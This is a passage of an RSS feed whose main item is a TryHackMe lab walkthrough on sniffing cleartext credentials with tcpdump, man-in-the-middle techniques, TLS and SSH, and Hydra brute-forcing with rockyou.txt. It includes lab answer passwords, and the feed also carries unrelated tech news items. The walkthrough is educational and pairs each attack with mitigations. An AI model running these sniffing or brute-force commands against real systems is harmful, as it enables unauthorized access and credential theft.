needs root privileges.</li><li>port 110 — only keep traffic to or from the POP3 server.</li><li>-A — print packet contents as ASCII, so cleartext is human-readable.</li></ul><p>In the capture, the login arrives across two packets and reads straight out:</p><pre>… USER frank … PASS D2xc9CgD</pre><p>Username frank, password D2xc9CgD, handed over in plain sight.</p><blockquote>Wireshark gets you there even faster: type “pop” in the display filter, and only POP3 traffic remains, credentials included.</blockquote><h4>Handy tcpdump filters</h4><pre>+------------------------------------+-----------------------------------------------------------+<br>| Command                            | Purpose                                                   |<br>+------------------------------------+-----------------------------------------------------------+<br>| sudo tcpdump port 110 -A           | Capture traffic on port 110 (POP3) in readable ASCII      |<br>| sudo tcpdump host 10.20.30.148 -A  | Capture ASCII traffic to/from a specific host IP          |<br>| sudo tcpdump port 80 -A            | Capture HTTP traffic (credentials in POST data)           |<br>| sudo tcpdump port 21 -A            | Capture FTP traffic (cleartext credentials)               |<br>| sudo tcpdump -w capture.pcap       | Save raw network packets to a file for later analysis     |<br>| tcpdump -r capture.pcap -A         | Read and display a saved capture file in ASCII text       |<br>+------------------------------------+-----------------------------------------------------------+</pre><h4>Mitigation</h4><p>Any cleartext protocol is exposed. The only requirement for the attack is a vantage point between the two parties or on the same network segment.</p><p>The core fix is encryption. This means wrapping the protocol in TLS (like HTTP to HTTPS, FTP to FTPS, or POP3 to POP3S) and replacing Telnet with SSH.</p><p>Layered on top of that:</p><ul><li>Network segmentation to limit who can see whose traffic</li><li>Encrypted VLANs or tunnels for sensitive internal traffic</li><li>802.1X port-based authentication so unknown devices can’t connect</li><li>Zero-trust thinking: treat every network as hostile and encrypt everything</li><li>Monitoring for ARP spoofing and other redirection to catch sniffing in progress</li></ul><p>Question: How do you capture only Telnet traffic with tcpdump? Answer: Telnet runs on port 23, so you add “port 23”.</p><p>Question: What is the simplest Wireshark display filter for IMAP? Answer: “imap”.</p><h3>Part 2 — Man-in-the-Middle (MITM) Attacks</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/678/1*uImWCNSpEizR46XoZzoc7g.png"><figcaption>Man-in-the-Middle Attack</figcaption></figure><p>Sniffing is passive listening. A <strong>MITM attack</strong> is active.</p><p>The attacker slips between two parties (A and B) so that A thinks it’s talking to B, while everything actually flows through the attacker. They can read and completely alter the data.</p><p>The room’s example says it best: A asks to transfer $20, the attacker rewrites the amount mid-flight, and B acts on the tampered message.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*C0zge6WQ4_HZjbPjnt1i0g.png"><figcaption>Image 1 from the room</figcaption></figure><p>It works whenever the protocol doesn’t verify the authenticity and integrity of each message.</p><h4>Getting into the middle</h4><p>To sit between two parties, an attacker has to redirect traffic through their own machine. Common routes include:</p><ul><li><strong>ARP spoofing</strong> — on a local network, the attacker sends forged ARP messages tying their own MAC address to the gateway’s IP, routing traffic directly to them.</li><li><strong>DNS spoofing </strong>— feeding false DNS answers to send victims to attacker-controlled servers.</li><li><strong>Rogue access points </strong>— fake Wi-Fi setups (like “Airport_WiFi_Free”) that route every connected victim’s traffic through the attacker.</li><li><strong>BGP hijacking </strong>— announcing false routes at the internet’s routing layer to reroute traffic for whole organizations or regions.</li></ul><h4>The tooling</h4><ul><li><strong>Bettercap </strong>— the modern, actively maintained successor to Ettercap. Handles ARP/DNS spoofing, HTTP/HTTPS proxying, and is modular.</li><li><strong>Ettercap</strong> — the classic LAN MITM tool. It still works, but Bettercap is generally preferred today.</li><li><strong>mitmproxy </strong>— an interactive HTTPS proxy used for inspecting and modifying web traffic on the fly.</li><li><strong>Responder </strong>—<strong> </strong>Windows-focused<strong>.</strong> Abuses fallback name-resolution protocols (LLMNR, NBT-NS) that kick in when DNS fails, answering with its own IP to capture authentication hashes. A staple of internal Active Directory pentests.</li></ul><h4>MITM against encrypted traffic</h4><p>Encryption raises the bar, but it isn’t a magic shield:</p><ul><li><strong>SSL stripping</strong> — quietly downgrade the victim’s connection to plain HTTP while the attacker keeps an HTTPS link to the real server. This is easy to miss if the user never typed <em>“https://”</em> or didn’t check for the padlock icon.</li><li><strong>Fake certificates</strong> — present your own certificate and run two separate encrypted legs. This works if the victim blindly clicks through the browser warning or if a Certificate Authority is compromised.</li><li><strong>Compromised or rogue CAs </strong>— the most serious case. If an attacker controls a trusted CA, they can mint valid-looking certificates for absolutely any domain.</li></ul><h4>Modern defenses</h4><p>A decade of security hardening makes MITM much harder now:</p><ul><li><strong>HTTPS by default</strong> (browsers flag plain HTTP as “Not Secure”)</li><li><strong>HSTS</strong> (forces HTTPS and blocks stripping attacks)</li><li><strong>Certificate Transparency</strong> (public, auditable logs of all issued certificates)</li><li><strong>Certificate pinning</strong> (apps accept only specific, hardcoded keys)</li><li><strong>DANE</strong> (publishing certificate info in DNSSEC-signed DNS)</li></ul><p>MITM still succeeds when users ignore certificate warnings, apps validate keys poorly, the target speaks cleartext, or legacy gear lacks modern features.</p><p>The fundamental fix remains the same: cryptography. You need authentication plus encryption/signing, which is exactly what properly implemented TLS provides.</p><p><strong>Question 1:</strong> How many interfaces does Ettercap offer?</p><pre>Answer: 3</pre><p><strong>Question 2:</strong> How many ways can you invoke Bettercap?</p><pre>Answer: 3</pre><h3>Part 3 — TLS: The Fix for Both Attacks</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/622/1*3Qn-dR4Ps9kwTxZGqRBBHw.jpeg"></figure><p>Both sniffing and MITM share one cure: TLS (Transport Layer Security). This part of the room is the solution chapter.</p><h4>A quick history</h4><p>SSL appeared in 1994 via Netscape, with SSL 3.0 dropping in 1996 as the web grew into shopping and payments. TLS succeeded it in 1999.</p><p>Where things stand now:</p><ul><li>SSL 2.0 and 3.0 are deprecated and highly insecure. Never use them.</li><li>TLS 1.0 and 1.1 were officially deprecated in 2021 and dropped by major browsers.</li><li>TLS 1.2 (from 2008) is still widely used and secure when configured with modern ciphers.</li><li>TLS 1.3 (from 2018) is the current standard. It features fewer algorithms, a faster handshake, and forward secrecy by default.</li></ul><p>People still say “SSL certificate” out of habit, but in practice, everything modern uses TLS.</p><h4>Where TLS sits</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Q9wEkyyAKPn28lVN9bDX2Q.png"><figcaption>Image 2 from the room</figcaption></figure><p>Cleartext application-layer protocols send data entirely in the open.</p><p>TLS adds encryption just below the application protocol, wrapping its data before it hits the network card. On the OSI model, it lives right between the transport and application layers.</p><h4>Upgrading protocols with TLS</h4><ul><li>HTTP (Port 80) upgrades to HTTPS (Port 443)</li><li>FTP (Port 21) upgrades to FTPS (Port 990)</li><li>SMTP (Port 25) upgrades to SMTPS (Port 465)</li><li>POP3 (Port 110) upgrades to POP3S (Port 995)</li><li>IMAP (Port 143) upgrades to IMAPS (Port 993)</li></ul><p>It’s not just web and mail. DNS can be wrapped too via DoT (DNS over TLS) on port 853, or DoH (DNS over HTTPS) on port 443. Both stop eavesdroppers from seeing which sites you look up.</p><h4>Implicit TLS vs STARTTLS</h4><ul><li>Implicit TLS uses a dedicated port that is fully encrypted from the very first byte (like 443 or 993).</li><li>STARTTLS connects in cleartext on the normal port, then issues a “STARTTLS” command to upgrade the connection in place. This is common for email setup.</li></ul><blockquote>Both offer encryption, but implicit TLS is highly preferred.</blockquote><p>A MITM attacker can easily strip the STARTTLS command during negotiation and force the session to stay in cleartext if the client isn’t configured to require it.</p><h4>How HTTPS works</h4><p>Plain HTTP takes two steps: open a TCP connection, then send requests. HTTPS inserts a step in between:</p><ol><li>Establish a standard TCP connection.</li><li>Establish a TLS connection (the handshake).</li><li>Send the HTTP requests, which are now fully encrypted.</li></ol><p>A simplified TLS 1.2 handshake goes like this:</p><blockquote><strong>ClientHello</strong> (client offers its TLS versions and cipher suites) <strong>→</strong> <strong>ServerHello</strong> (server picks the parameters and sends its certificate) <strong>→ Key Exchange</strong> (both derive a shared secret)<strong> →</strong> <strong>Finished</strong> (both confirm and switch to encrypted communication):</blockquote><pre>ClientHello → ServerHello → Key Exchange → Finished</pre><h4>Certificates and trust</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/980/1*-10wNzrM0tEpRINoAqc5mQ.png"><figcaption>Certificate Authority (CA)</figcaption></figure><p>HTTPS leans on certificates signed by trusted Certificate Authorities (CAs). Your browser expects a valid certificate from a trusted CA, which proves you’re talking to the real server and blocks easy MITM attempts.</p><p>A certificate shows who it was issued to, who issued it, and its validity period. An expired certificate should never be trusted.</p><p>The modern ecosystem made this nearly universal thanks to automated platforms like <a href="https://letsencrypt.org/"><em>Let’s Encrypt</em></a>, which pushed global HTTPS traffic past 95%.</p><p><strong>Question:</strong> What is the three-letter acronym for the DNS protocol that uses TLS?</p><pre>Answer: DoT (DNS over TLS)</pre><h3>Part 4 — SSH: Secure Remote Administration</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/920/1*EidIDqyfQGBr2l3Y-KLmog.png"><figcaption>SSH</figcaption></figure><p>SSH (Secure Shell) is the secure replacement for Telnet. It is the universal way to administer servers, network gear, and cloud infrastructure.</p><p>The “S” means you can confirm the server’s identity, your messages are encrypted for the intended recipient only, and any data tampering is instantly detectable.</p><blockquote>It handles confidentiality and integrity seamlessly over port 22.</blockquote><h4>Authentication methods</h4><ul><li><strong>Password </strong>— The simplest method. The password rides the encrypted channel, but weak choices can still fall to brute-force attacks.</li><li><strong>Public key (recommended) </strong>— A private key stays on your machine, while the public key goes on the server. The server challenges you to prove you hold the private key without ever transmitting it.</li><li><strong>Certificate-based </strong>— An SSH CA signs user and host keys. This scales incredibly well because you don’t have to manually distribute public keys to every single server.</li><li><strong>MFA </strong>— Combines a traditional key or password with a one-time code for high-security environments.</li></ul><h4>Connecting</h4><ul><li>To connect, you run:</li></ul><pre>ssh mark@MACHINE_IP</pre><p>Enter the password or let your key authenticate, and you are on the remote terminal. Every single command you send runs over an encrypted channel.</p><p><strong>Question:</strong> Connect as mark (password XBtc49AB) and find the kernel release with uname -r.</p><pre>Commands: ssh mark@MACHINE_IP uname -r</pre><pre>Answer: 5.15.0–119-generic</pre><h4>Host key verification</h4><p>On your very first connection, SSH shows the server’s key fingerprint and asks if you want to continue.</p><p>Ideally, you verify this fingerprint through an admin or config management before typing “yes”. It is then saved in your local known_hosts file.</p><p>If that key ever changes unexpectedly in the future, SSH throws a massive warning, a major indicator of a potential MITM attack or a reinstalled server.</p><h4>Generating keys</h4><ul><li>To create a new key pair, run:</li></ul><pre>ssh-keygen -t ed25519 -C "your_email@example.com"</pre><p>The private key stays strictly on your machine and should be passphrase-protected. The public key (.pub) is safe to share. You can push it to a remote server easily using:</p><pre>ssh-copy-id mark@MACHINE_IP</pre><h4>Useful options</h4><pre>+--------------------------------------------+------------------------------------------------------------+<br>| Command                                    | Purpose                                                    |<br>+--------------------------------------------+------------------------------------------------------------+<br>| ssh -p 2222 mark@MACHINE_IP                | Connect to a remote server running on a non-standard port   |<br>| ssh -i ~/.ssh/custom_key mark@MACHINE_IP   | Specify a specific private key file to use for login       |<br>| ssh -J bastion.example.com mark@internal   | Jump through a secure bastion host to reach an internal IP |<br>| ssh -L 8080:localhost:80 mark@MACHINE_IP   | Set up a local port forward to tunnel traffic through SSH  |<br>| ssh -D 9050 mark@MACHINE_IP                | Create a dynamic SOCKS proxy forward for traffic routing   |<br>| ssh mark@MACHINE_IP "cat /etc/passwd"      | Run a single, one-off command without opening a full shell |<br>+--------------------------------------------+------------------------------------------------------------+</pre><h4>Secure file transfer</h4><ul><li><strong>SFTP</strong> — Interactive, FTP-like file management running completely over SSH. This is the recommended choice today.</li><li><strong>SCP </strong>— Simple file copies over SSH. This is now deprecated by OpenSSH in favor of SFTP, though it still works on most systems.</li><li><strong>rsync over SSH </strong>— The best option for large or repeated transfers because it only copies the specific parts of files that changed.</li></ul><p>To copy files via SCP:</p><pre>scp mark@MACHINE_IP:/home/mark/archive.tar.gz ~/ (remote to local)</pre><pre>scp backup.tar.bz2 mark@MACHINE_IP:/home/mark/ (local to remote)</pre><p><strong>Quick clarifier:</strong></p><blockquote>SFTP runs over SSH (port 22).</blockquote><blockquote>FTPS is FTP-over-TLS (port 990).</blockquote><p>They are entirely different protocols despite having similar names.</p><p><strong>Question:</strong> Download book.txt from the remote system; what download size did scp display in KB?</p><pre>Command: scp mark@MACHINE_IP:/home/mark/book.txt ~/</pre><pre>Answer: 415</pre><h4>Hardening SSH</h4><p>To protect a server, you can modify its config file <em>(/etc/ssh/sshd_config)</em>:</p><ul><li>Set PasswordAuthentication to “no” once public keys are established.</li><li>Set PermitRootLogin to “no” to force users to log in with regular accounts first.</li><li>Use AllowUsers or AllowGroups to create an explicit access whitelist.</li><li>Change the default port to reduce automated log noise.</li><li>Deploy fail2ban to automatically block IPs with repeated failed login attempts.</li></ul><h3>Part 5 — Password Attacks</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*6_lWVwmNlB93-2JkYWo8Og.png"></figure><p>Even with a network fully encrypted, authentication remains a primary target. Authentication is simply the act of proving your identity, like entering a password to access a service.</p><p>The three factors:</p><ul><li><strong>Something you know </strong>— a password or PIN</li><li><strong>Something you have </strong>— a phone, hardware security key, or smart card</li><li><strong>Something you are </strong>— a fingerprint or facial scan</li></ul><p>This section focuses entirely on attacking “something you know.”</p><h4>Why weak passwords persist</h4><p>Massive historic breaches show that old habits die hard.</p><p>The most common passwords found in modern breaches still include variations like 123456, password, qwerty, Password1, and seasonal choices like Summer2024.</p><p>Because people constantly reuse passwords across multiple sites, a single leak frequently gives attackers access to entirely unrelated corporate or personal accounts.</p><h4>Types of attacks</h4><ul><li><strong>Guessing </strong>— using personal info like a target’s pet, birth year, or favorite sports team harvested from social media.</li><li><strong>Dictionary</strong>— automatically trying lists of real words and common variations.</li><li><strong>Brute force </strong>— systematically trying every possible characters combination. This is exhaustive, which is why password length matters so much.</li><li><strong>Credential stuffing</strong> — taking leaked username/password pairs from old breaches and automatically testing them against other web services.</li><li><strong>Password spraying </strong>— testing one or two incredibly common passwords against a massive list of user accounts to dodge lockout policies.</li><li><strong>Hybrid</strong> — combining dictionary words with systematic patterns, like capitalizing the first letter and adding a year to the end.</li></ul><h4>Wordlists</h4><ul><li>The classic go-to wordlist is RockYou, located on the TryHackMe AttackBox at:</li></ul><pre>/usr/share/wordlists/rockyou.txt</pre><blockquote>Beyond that, security professionals use collections like SecLists, CrackStation lists, or custom-generated lists tailored specifically to the target’s language, region, or industry habits.</blockquote><h4>THC Hydra</h4><p>Hydra is a fast network login cracker that throws wordlists at live services like FTP, POP3, IMAP, SSH, and HTTP.</p><p>The basic syntax looks like this:</p><pre>hydra -l username -P wordlist.txt server service</pre><ul><li>-l specifies a single username (-L for a text file of names)</li><li>-P specifies a password wordlist (-p for a single password)</li><li>server is the target IP or hostname</li><li>service is the protocol you are targeting</li></ul><p>Examples:</p><pre>hydra -l mark -P /usr/share/wordlists/rockyou.txt MACHINE_IP ftp<br>hydra -l frank -P /usr/share/wordlists/rockyou.txt MACHINE_IP ssh<br>hydra -l lazie -P /usr/share/wordlists/rockyou.txt MACHINE_IP imap</pre><p>Handy options include -s to target a non-default port, -vV for detailed verbosity, -t to adjust parallel attack threads, and -f to immediately stop execution when the first valid password is found.</p><h4>Other tools</h4><p>Alternative online crackers include <strong>Medusa</strong> and <strong>Ncrack</strong>.</p><p>For Windows and Active Directory environments, tools like <strong>NetExec</strong> excel at spraying credentials over SMB and LDAP.</p><p>If you manage to dump password hashes from a database, offline tools like <strong>Hashcat</strong> or <strong>John the Ripper </strong>are used because they can guess millions of combinations per second without worrying about network lag or lockouts.</p><h4>Mitigation</h4><p>Defending against password attacks requires a modern approach to identity management:</p><ul><li>Enforce <strong>length-first password policies</strong> based on NIST guidelines. Favor overall length over complex character rotation, and check new passwords against lists of known compromised credentials.</li><li>Implement <strong>strict account lockout</strong> or <strong>throttling mechanisms</strong> to kill automated automated guessing, while remaining aware of password spraying patterns.</li><li>Use <strong>CAPTCHAs</strong> to prevent basic bot execution on login forms.</li><li>Deploy <strong>Multi-Factor Authentication (MFA)</strong> across all external endpoints.</li><li>Transition toward <strong>passwordless ecosystems</strong>, utilizing passkeys (FIDO2/WebAuthn), hardware keys, or verified magic links.</li></ul><p><strong>Question: </strong>One email account is lazie; what password accesses the IMAP service?</p><pre>Command: hydra -l lazie -P /usr/share/wordlists/rockyou.txt MACHINE_IP imap</pre><pre>Answer: butterfly</pre><h3>Key Takeaways</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*35eDunQG0NLCy_K2XVOvtA.jpeg"></figure><p>The fundamental rule of network security is simple:</p><blockquote>Cleartext protocols are inherently insecure.</blockquote><p>Anything sent without encryption can be effortlessly intercepted by sniffing or manipulated via a Man-in-the-Middle attack.</p><p>The security path forward is uniform across all services:</p><ul><li>Use HTTPS instead of HTTP</li><li>Use SSH instead of Telnet</li><li>Use SFTP or FTPS instead of basic FTP</li><li>Use IMAPS, POP3S, and SMTPS instead of their legacy cleartext variants</li></ul><p>Even when a connection is perfectly encrypted, weak passwords remain a glaring vulnerability.</p><p>Secure the protocol with robust encryption, then secure the account with long passwords, rate limiting, and multi-factor authentication.</p><h4>Quick Port Reference Guide</h4><pre>+-------------------+------+----------------+<br>| Protocol          | Port | Security       |<br>+-------------------+------+----------------+<br>| FTP               | 21   | Cleartext      |<br>| FTPS              | 990  | TLS (implicit) |<br>| HTTP              | 80   | Cleartext      |<br>| HTTPS             | 443  | TLS (implicit) |<br>| IMAP              | 143  | Cleartext      |<br>| IMAPS             | 993  | TLS (implicit) |<br>| POP3              | 110  | Cleartext      |<br>| POP3S             | 995  | TLS (implicit) |<br>| SMTP              | 25   | Cleartext      |<br>| SMTP submission   | 587  | STARTTLS       |<br>| SMTPS             | 465  | TLS (implicit) |<br>| SSH / SFTP        | 22   | Encrypted (SSH)|<br>| Telnet            | 23   | Cleartext      |<br>+-------------------+------+----------------+</pre><p><em>Room: Protocols and Servers 2 — TryHackMe (</em><a href="https://tryhackme.com/room/protocolsandservers2"><em>https://tryhackme.com/room/protocolsandservers2</em></a><em>). This writeup is for educational purposes; only test systems you’re authorized to. Have fun!</em></p><p><em>This article was written by Pop123 as a walkthrough for the TryHackMe lab. I am as always open to further discussing the topic.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=42c2d01f5c6c" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/protocols-and-servers-2-tryhackme-writeup-42c2d01f5c6c">Protocols and Servers 2 TryHackMe Writeup</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How America's 250th birthday became a test of AI-powered collective intelligence]]></title>
<description><![CDATA[Imagine if you could bring 250 people together in a massive room and have them discuss and debate an important issue, arguing the points and counterpoints, and converging on answers that accurately reflect their collective knowledge, wisdom, values, and sensibilities.Now imagine that you convened...]]></description>
<link>https://tsecurity.de/de/3645848/it-nachrichten/how-americas-250th-birthday-became-a-test-of-ai-powered-collective-intelligence/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3645848/it-nachrichten/how-americas-250th-birthday-became-a-test-of-ai-powered-collective-intelligence/</guid>
<pubDate>Sat, 04 Jul 2026 22:16:59 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Imagine if you could bring 250 people together in a massive room and have them discuss and debate an important issue, arguing the points and counterpoints, and converging on answers that accurately reflect their collective knowledge, wisdom, values, and sensibilities.</p><p>Now imagine that you convened this debate on <b>America’s 250</b><b><sup>th</sup></b><b> birthday</b> and asked 250 randomly selected Americans to come up with the <b>top three innovations </b>that America has contributed to the world over the last 250 years.<b> </b>What would they come up with?</p><p>I know – this all sounds impossible. </p><p>After all, you can’t get more than a dozen people to have a productive conversation on anything. At large scale, nobody would get enough airtime to express their views or respond to others. This is why typical business meetings or focus groups never have more than 8 to 10 people. Thoughtful real-time conversations just don’t scale.</p><p>To solve this, a new category of AI technology called <i>“hyper-communication</i>” is greatly expanding the size, scope, and efficiency of large-scale deliberations. It uses specialized <a href="https://venturebeat.com/technology/agentic-ai-solved-coding-and-exposed-every-other-problem-in-software-engineering">AI agents</a> to connect groups in real-time, allowing people to <a href="https://www.intechopen.com/chapters/1223362"><u>discuss and debate issues at any scale</u></a>. The goal is to enable hundreds or even thousands of participant to hold thoughtful discussions where they can express their views and argue the merits of any issue. </p><p>I first wrote about this emerging technology in VentureBeat two years ago in an article about “<a href="https://venturebeat.com/ai/can-we-use-generative-ai-to-build-a-global-hive-mind"><u>Collective Superintelligence</u></a>.” In that piece, I explain how large human groups can be hyper-connected by AI agents in ways that greatly <a href="https://arxiv.org/abs/2401.15109"><u>amplify the group’s collective intelligence</u></a>. You can check out the science behind hyper-communication in that prior VentureBeat piece. Here I am focusing on the debate among 250 Americans on America’s birthday.</p><p>To do this, I asked the team at Unanimous AI to field a randomly selected group of at least 250 Americans (with a broad distribution from every region in the country and diverse mix of political and social demographics) and invite them to a twenty-minute online debate inside a hyper-communication platform called <a href="https://www.thinkscape.ai/"><u>Thinkscape</u></a> that enables massively scalable discussion by text, voice, or video.   </p><p>Once connected, we asked the group to come up with the <b>top three contributions</b> that America has made to the world over the last 250 years – not a survey of opinions, but deliberation of ideas,  arguments, evidence, and reasoning. The group converged on a set of top answers that surprised me – but on reflection, they were sensible and well-reasoned. </p><p>Before getting into the answers, let me show you what the debate looks like behind the scenes. There were 277 people, each of them debating the issues with four or five other people in parallel discussion spaces. The magic is the <a href="https://unanimous.ai/hyperchat-ai/"><u>swarm of AI agents</u></a> that connect all the small groups together into a single real-time deliberation.This is what it looks like at high speed:</p><p>In the debate above, the group of 277 people came up with <b>94 different ideas</b> and then narrowed it down to a <b>top 10,</b> then a <b>top 3</b>. In the gif above, we  just plot the top ten ideas as they emerged and battle for support during the live conversational debate. </p><p>The most interesting part of a large debate like this is not the answers, but the reasons that emerge to justify the answers. Here is the group’s reasoning behind the “top three innovations” that America has given to the world over the last 250 years:</p><p><b>#1: The Internet:</b> <i>“Our collective perspective is that America’s greatest contribution to the world over the past 250 years is the internet. It was born exclusively in the U.S. through academic and government research and was scaled globally with profound impact. It transformed communication, democratized information and education, enabled commerce, medicine, research and cultural exchange, and amplified soft power and civic organizing. We also acknowledged significant harms (misinformation, addiction, privacy loss) and arguments that it’s recent, global, or not uniquely American.”</i></p><p><b>#2 Advances in medicine</b>: <i>“Our collective perspective is that the United States has saved and prolonged hundreds of millions of lives worldwide. American-developed vaccines have successfully eradicated or controlled once-deadly diseases, significantly extending life expectancy and enabling broader societal and technological progress. From major breakthroughs in cancer research and treatments to cutting-edge medical technologies that have revolutionized hospital safety and procedures, U.S. ingenuity has redefined healthcare. Ultimately, while the global diffusion of affordable medicines and vaccines has extended these benefits across borders, the U.S. remains a premier medical destination where people from around the world travel to receive the most advanced treatments.”</i></p><p><b>#3: Spreading democracy:</b>  “Our collective perspective is that one of America’s most significant global contributions is the nation's system of governance. The US has long demonstrated democracy in practice as an enduring global model. The U.S. Constitution provided a vital blueprint for representative government, inspiring democratic movements and revolutions worldwide while actively promoting human rights and individual liberties internationally. By empowering citizens with the fundamental power to vote and choose their own leaders, this framework has served as a foundational framework for broader societal advances and directly helped establish thriving democracies around the world.”</p><p>It’s important to remember, this is 100% human intelligence — a pure reflection of the collective knowledge, wisdom, and values of 277 randomly selected Americans. That’s because the role of the AI agents in a <a href="https://unanimous.ai/hyperchat-ai/"><u>hyper-communication system</u></a> is to <i>connect people, </i>not replace them. The agents work to enable scalable <i>human deliberation</i> in which every participant is given optimized ability to express their views, respond to others, and converge on solutions based on their merits. The only question left is — <b>what should we ask next? </b></p><p><i></i><a href="https://sites.google.com/view/louisrosenberg/bio"><i><u>Louis Rosenberg</u></i></a><i> earned his PhD from Stanford University, was a professor at California State University (Cal Poly) and has been awarded over 300 patents for his work in human-computer interaction, AI, and collective intelligence.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[iPad vs iPad Air vs iPad Pro vs iPad mini: Which One Should You Buy?]]></title>
<description><![CDATA[Buying an iPad now takes more thought than before because Apple sells four main models with many shared features, similar accessories, and different performance levels, so the right choice depends on how you plan to use it every day.



Apple currently positions the regular iPad as the simple eve...]]></description>
<link>https://tsecurity.de/de/3644714/ios-mac-os/ipad-vs-ipad-air-vs-ipad-pro-vs-ipad-mini-which-one-should-you-buy/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644714/ios-mac-os/ipad-vs-ipad-air-vs-ipad-pro-vs-ipad-mini-which-one-should-you-buy/</guid>
<pubDate>Sat, 04 Jul 2026 05:39:19 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Buying an iPad now takes more thought than before because Apple sells four main models with many shared features, similar accessories, and different performance levels, so the right choice depends on how you plan to use it every day.



Apple currently positions the regular iPad as the simple everyday option, the iPad mini as the compact travel-friendly model, the iPad Air as the balanced power pick, and the iPad Pro as the high-end choice for users who need the best display, fastest chip, and most advanced features.



iPad: Best for Everyday Use



The standard iPad works best for students, casual users, families, and anyone who mainly wants a tablet for streaming, browsing, video calls, notes, light work, and Apple Pencil use without paying for Pro-level power.



It has a modern all-screen design, supports Apple Pencil, works with the Magic Keyboard Folio, and now starts with 128GB storage, which makes it a stronger value than older base iPads. However, it does not support Apple Intelligence, so buyers who want Apple’s AI features should look at the iPad Air, iPad mini, or iPad Pro.



iPad Air: Best Balance of Power and Price



The iPad Air sits in the middle of the lineup and makes the most sense for people who want strong performance without paying for the iPad Pro. It comes in 11-inch and 13-inch sizes, supports Apple Intelligence, works with Apple Pencil Pro, and has enough power for creative apps, multitasking, photo editing, and school or office work.



The 13-inch iPad Air gives you a large screen for less money than the iPad Pro, but buyers should remember that accessories cost extra, and the bigger model is not always the most portable option.



iPad Pro: Best for Serious Creative Work



The iPad Pro is Apple’s most advanced iPad, and it targets users who care about the best display, top performance, thinner design, faster data transfer, ProMotion, ProRes video support, and external display workflows.



Most users do not need this much power, especially if they only browse, stream, write, draw, or edit simple photos and videos. The iPad Pro makes sense for professionals who already know why they need its OLED display, M-series chip, and higher-end features.



iPad mini: Best for Portability



The iPad mini is the easiest iPad to carry, and it works well for reading, note-taking, travel, medical work, aviation use, and one-handed browsing. It supports Apple Intelligence and Apple Pencil Pro, which makes it more capable than its small size suggests.



Still, the iPad mini suits a specific type of user because its small screen limits serious multitasking, spreadsheet work, and long typing sessions.



Final Take



The regular iPad gives most people the best value, the iPad Air offers the strongest balance, the iPad Pro serves demanding users, and the iPad mini works best for people who want power in a small tablet. Before buying, check storage, accessory costs, screen size, and Apple Intelligence support because these details affect the real price and long-term use.]]></content:encoded>
</item>
<item>
<title><![CDATA[Heroes of Might and Magic 2 project fheroes2 version 1.1.17 is out now]]></title>
<description><![CDATA[A new version of the Might and Magic II game engine fheroes2 has arrives - version 1.1.17 brings multiple major improvements.Read the full article on GamingOnLinux.]]></description>
<link>https://tsecurity.de/de/3644015/linux-tipps/heroes-of-might-and-magic-2-project-fheroes2-version-1117-is-out-now/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644015/linux-tipps/heroes-of-might-and-magic-2-project-fheroes2-version-1117-is-out-now/</guid>
<pubDate>Fri, 03 Jul 2026 18:30:09 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A new version of the Might and Magic II game engine fheroes2 has arrives - version 1.1.17 brings multiple major improvements.<p><img src="https://www.gamingonlinux.com/uploads/articles/tagline_images/2116109696id29327gol.webp" alt></p><p>Read the full article on <a href="https://www.gamingonlinux.com/2026/07/heroes-of-might-and-magic-2-project-fheroes2-version-1-1-17-is-out-now/">GamingOnLinux</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wormzy - Secure Fast p2p file transfer]]></title>
<description><![CDATA[Wormzy is my project that aims to replace “the magic worm hole” it’s built on QUIC/pake2/Noise/ChaCha as the primitives. No need to register or anything. Need to send a huge file? wormzy send bigfile  That will give you a pairing code to give to the receiver who simply receives the file via: worm...]]></description>
<link>https://tsecurity.de/de/3642583/linux-tipps/wormzy-secure-fast-p2p-file-transfer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642583/linux-tipps/wormzy-secure-fast-p2p-file-transfer/</guid>
<pubDate>Fri, 03 Jul 2026 04:08:10 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Wormzy is my project that aims to replace “the magic worm hole” it’s built on QUIC/pake2/Noise/ChaCha as the primitives. No need to register or anything. Need to send a huge file?</p> <p>wormzy send bigfile </p> <p>That will give you a pairing code to give to the receiver who simply receives the file via:</p> <p>wormzy recv &lt;code&gt; </p> <p>It’s still under development but very much usable. It will attempt to NAT punch the best it can before falling back to relay server. It’s written in Golang so it’s easily cross platform. </p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/jdefr"> /u/jdefr </a> <br> <span><a href="https://github.com/jdefrancesco/wormzy">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1ulwr7z/wormzy_secure_fast_p2p_file_transfer/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Faltbar, federleicht und fast kompromisslos - Test Honor Magic V6]]></title>
<description><![CDATA[V6rblüffend. | Das Honor Magic V6 kombiniert ein extrem schlankes Design mit großem Akku, starker Ausstattung und vielseitigen Kameras. Trotz kleiner Verbesserungen gegenüber dem Vorgänger überzeugen Leistung und Alltagstauglichkeit, auch wenn Innendisplay und Kühlung noch Luft nach oben haben.]]></description>
